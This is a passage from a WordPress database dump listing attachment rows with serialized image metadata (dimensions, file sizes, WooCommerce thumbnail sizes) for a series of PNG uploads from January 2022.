";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"03-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:13:\"03-320x64.png\";s:5:\"width\";i:320;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1120,492,'_wp_attached_file','2022/01/04.png'),(1121,492,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:519;s:6:\"height\";i:389;s:4:\"file\";s:14:\"2022/01/04.png\";s:8:\"filesize\";i:320603;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"04-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:144019;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19385;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"04-50x37.png\";s:5:\"width\";i:50;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4450;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"04-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"04-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"04-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"04-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1122,493,'_wp_attached_file','2022/01/05.png'),(1123,493,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:521;s:6:\"height\";i:397;s:4:\"file\";s:14:\"2022/01/05.png\";s:8:\"filesize\";i:181012;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"05-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:86406;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"05-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13612;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"05-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3248;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"05-300x229.png\";s:5:\"width\";i:300;s:6:\"height\";i:229;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"05-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"05-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"05-48x37.png\";s:5:\"width\";i:48;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"05-48x37.png\";s:5:\"width\";i:48;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:13:\"05-320x64.png\";s:5:\"width\";i:320;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1124,494,'_wp_attached_file','2022/01/06.png'),(1125,494,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:530;s:6:\"height\";i:400;s:4:\"file\";s:14:\"2022/01/06.png\";s:8:\"filesize\";i:361665;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"06-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:158372;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"06-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20879;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"06-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4793;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"06-300x226.png\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"06-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"06-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"06-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"06-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1126,495,'_wp_attached_file','2022/01/07.png'),(1127,495,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:524;s:6:\"height\";i:393;s:4:\"file\";s:14:\"2022/01/07.png\";s:8:\"filesize\";i:270147;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"07-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119780;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"07-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17978;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"07-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4221;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"07-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"07-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"07-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"07-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"07-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"07-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:13:\"07-320x64.png\";s:5:\"width\";i:320;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1128,496,'_wp_attached_file','2022/01/08.png'),(1129,496,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:525;s:6:\"height\";i:396;s:4:\"file\";s:14:\"2022/01/08.png\";s:8:\"filesize\";i:245813;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"08-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:112940;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"08-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17358;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"08-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4207;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"08-300x226.png\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"08-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"08-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"08-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"08-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"08-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1130,497,'_wp_attached_file','2022/01/09.png'),(1131,497,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:536;s:6:\"height\";i:401;s:4:\"file\";s:14:\"2022/01/09.png\";s:8:\"filesize\";i:227111;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"09-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98193;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"09-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14276;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"09-50x37.png\";s:5:\"width\";i:50;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3511;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"09-300x224.png\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"09-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"09-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"09-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"09-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"09-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1132,498,'_wp_attached_file','2022/01/10.png'),(1133,498,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:532;s:6:\"height\";i:403;s:4:\"file\";s:14:\"2022/01/10.png\";s:8:\"filesize\";i:327671;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"10-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:154022;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"10-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21858;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"10-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4702;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"10-300x227.png\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"10-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"10-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"10-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"10-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_thumbnail_preview\";a:4:{s:4:\"file\";s:13:\"10-320x64.png\";s:5:\"width\";i:320;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1134,499,'_wp_attached_file','2022/01/11.png'),(1135,499,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:516;s:6:\"height\";i:392;s:4:\"file\";s:14:\"2022/01/11.png\";s:8:\"filesize\";i:282149;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"11-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132419;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19472;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"11-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4656;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"11-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"11-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"11-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"11-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1136,500,'_wp_attached_file','2022/01/12.png'),(1137,500,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:539;s:6:\"height\";i:390;s:4:\"file\";s:14:\"2022/01/12.png\";s:8:\"filesize\";i:396130;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"12-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:167393;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"12-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20726;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"12-50x36.png\";s:5:\"width\";i:50;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4387;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"12-300x217.png\";s:5:\"width\";i:300;s:6:\"height\";i:217;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"12-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"12-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"12-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"12-48x35.png\";s:5:\"width\";i:48;s:6:\"height\";i:35;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"12-48x35.png\";s:5:\"width\";i:48;s:6:\"height\";i:35;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1138,501,'_wp_attached_file','2022/01/13.png'),(1139,501,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:529;s:6:\"height\";i:399;s:4:\"file\";s:14:\"2022/01/13.png\";s:8:\"filesize\";i:333868;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"13-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:146767;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"13-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20287;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"13-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4708;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"13-300x226.png\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"13-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"13-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"13-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"13-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"13-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1140,502,'_wp_attached_file','2022/01/14.png'),(1141,502,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:517;s:6:\"height\";i:396;s:4:\"file\";s:14:\"2022/01/14.png\";s:8:\"filesize\";i:269864;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"14-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119452;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"14-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18016;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"14-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4551;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"14-300x230.png\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"14-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"14-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"14-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"14-48x37.png\";s:5:\"width\";i:48;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"14-48x37.png\";s:5:\"width\";i:48;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6: